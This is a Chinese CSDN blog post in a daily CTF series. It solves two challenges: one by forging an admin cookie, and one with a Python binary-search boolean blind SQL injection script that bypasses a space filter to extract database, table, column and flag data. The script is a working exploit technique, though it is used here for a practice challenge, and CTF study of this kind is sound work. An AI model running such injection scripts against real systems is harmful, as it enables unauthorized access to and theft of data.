一天一道ctf 第47天(二分法盲注)

最新推荐文章于 2022-10-01 21:48:28 发布
最新推荐文章于 2022-10-01 21:48:28 发布
阅读量297 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119139241
版权

[BSidesCF 2019]Kookie
在这里插入图片描述
看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???)
在这里插入图片描述
[WUSTCTF2020]颜值成绩查询
在这里插入图片描述
输入学号查成绩,那肯定就是sql注入了。之前也做过一道类型差不多的盲注,尝试二分法爆破。注意这道题空格被过滤了,用/**/代替空格。

import requests
URL ="http://a9ca4ca6-8f5a-4891-aba1-083c0fc8e751.node4.buuoj.cn/index.php?stunum="
'''
result=''
i=0
while True:
    i+=1
    low=32
    high=127
    while(low<high):
        mid=(low+high)>>1
        #payload="if(ascii(substr(database(),%d,1))>%d,1,0)"%(i,mid)
        #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i, mid)
        #payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i, mid)
        payload = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))>%d,1,0)" % (i, mid)
        r=requests.get(URL+payload)
        r.encoding = "utf-8"
        if" your score is" in r.text:
            low = mid + 1
        else:
            high = mid
    if low != 32:
        result += chr(low)
    else:
        break
    print(result)
'''
'''
result = ''
i = 0
while True:
    i += 1
    print(i)
    low = 32
    high = 127
    while low<high:
        payload = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))=%d,1,0)" % (i, low)
        r = requests.get(URL + payload)
        r.encoding = "utf-8"
        if " your score is" in r.text:
            result += chr(low)
            break
        low+=1
    print(result)
'''



table = ""
for i in range(1, 300):
    print(i)
    high = 128
    low = 31
    while (low <= high):

        mid = (low + high) // 2
        print(mid)
        payload11 = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))=%d,1,0)" % (i, mid)
        payload12 = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))<%d,1,0)" % (i, mid)
        payload13 = "if(ascii(substr((select/**/group_concat(value)from(flag)),%d,1))>%d,1,0)" % (i, mid)

        ra11 = requests.get(URL + payload11)
        ra12 = requests.get(URL + payload12)
        ra13 = requests.get(URL + payload13)
        ra11.encoding = "utf-8"
        ra12.encoding = "utf-8"
        ra13.encoding = "utf-8"
        if 'your score is' in ra11.text:
            table += chr(mid)
            print(table)
            break
        if 'your score is' in ra12.text:
            # print ("'low='+%d + 'high=' + %d"%(low,high))
            high = mid - 1
        if "your score is" in ra13.text:
            # print ("'low='+%d + 'high=' + %d"%(low,high))
            low = mid + 1
scrawman
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow web190 二分法盲经典脚本 有单引号,利用回显不同
10-21
ctfshow web190 二分法盲经典脚本 有单引号,利用回显不同
CTFSQL盲.py
11-25
CTF解题中有时会用到盲,这是一段SQL盲代码,运行于python37环境,多个字段信息提取的句子已释保存。
CTF_流量日志分析】二分法盲分析
serendipity1130的博客
10-16 1758
1.打开日志文件发现又是一道二分法盲流量,观察任意几条: 分析过程: 当状态码位200的时候,表示正确,报错为404,所以第21位大于101正确,大于102报错,所以正确字符为101,所以盲出来的字符串应该是状态码等于200时的字符或等于404时的ascii码减去1 2.根据以上分析写出脚本: import urllib.parse import requests,re f = open('日志里的秘密.log','r',encoding='gb18030',errors='ignore
CTF 简单sql
明月于心的博客
07-25 1232
针对网络安全实验室 入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
Bugku Web CTF-学生成绩查询
No Title
12-16 1192
Bugku Web CTF-学生成绩查询 该题解题思路是SQL入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
二分法盲
qq_43756333的博客
05-25 2756
在学sql盲脚本的时候碰到了使用二分法盲字段的情况,学习一下。 环境: [CISCN2019 华北赛区 Day2 Web1]Hack World 复现地址:BUUCTF 打开题目 直接告诉了flag在flag表和flag列里,让我们提交id。 这道题过滤了一些字段以及常用入语句,可以用Burpsuite来fuzz测试一下,如下所示,长度为482的代表被过滤 最后使用的方法是异或入,有关异或入的原理,可参考异或入 直接给出payload:1^(if((ascii(substr((select
BUUCTF WEB [GXYCTF2019]BabySQli
Y1da的博客
04-18 744
BUUCTF WEB [GXYCTF2019]BabySQli 手工入 这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据 假设联合查询前表结构如下 id name password 1 tom 123456 此时执行联合查询 select * from 'users' where name='admin' union select 2,'admin','123'; 表结构将会变成 id name password 1
ctfshow web214 时间盲标准脚本
10-21
ctfshow web214 时间盲标准脚本
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
二分法查找算法代码 c语言实现
08-20
欢迎下载,资源共享。c语言实现。排序方法
二分法实现SQL盲
小菜猴子_x
09-12 1040
因为在buu上做题,然后无奈研究二分法实现SQL盲
程序员的数学课16 二分法:如何利用指数爆炸优化程序?
fegus的博客
10-01 1002
正式讲课之前,我先问你这样一个问题,请你尽可能快速回答。一张 1 毫米厚度的纸,对折几次后,可以达到地球到月球的距离(39 万公里)?我在写这篇稿子的时候,问了身边的几个朋友。最小的回答是 1 万次,最大的则是 100 万次。请问在你的直觉下,你的答案又是多少呢?我猜想无论如何都是上万次吧,毕竟我们离月球有 39 万公里呢。折纸的过程就是 1 变 2,2 变 4,4 变 8,这样一个翻一倍的过程。聪明的你,会发现其实这就是一个关于指数函数和对数函数的问题。那么,这与我们的编程有什么关系吗?
ctf-web-成绩查询
god_001的博客
04-13 1127
题目: 打开网页: 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
python的sqli-labs15的二分法时间盲
Programmonkeykin的博客
12-11 4087
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
[SQL盲]CTFSHOW------WEB8(二分法快速爆出数据)
Y4tacker的博客
08-05 6399
补充一些绕过方法: 1.将limit 0,1样式改为limit 1 offset 0。 2.将substr(string,1,1)改为substr(string from 1 for 1)。 这道题是盲,至于是为什么可以看其他师傅的,我不想多说,只是想记录下我的脚本而已 我的payload分别是查数据库、数据表、列名和爆字段,自己取消释玩, 然后url前半部分改成你的靶机的url import requests url = "http://a448d26a-b594-47a1-b3e0-fddbe1d
[DownUnderCTF 2022] crypto部分复现
weixin_52640415的博客
09-29 1037
DownUnderCTF 2022 crypto
CTF——流量分析题型整理总结
热门推荐
小锤队长的博客
12-19 4万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
ctfhub布尔盲
最新发布
08-31
布尔盲是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔盲的题目。 布尔盲是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值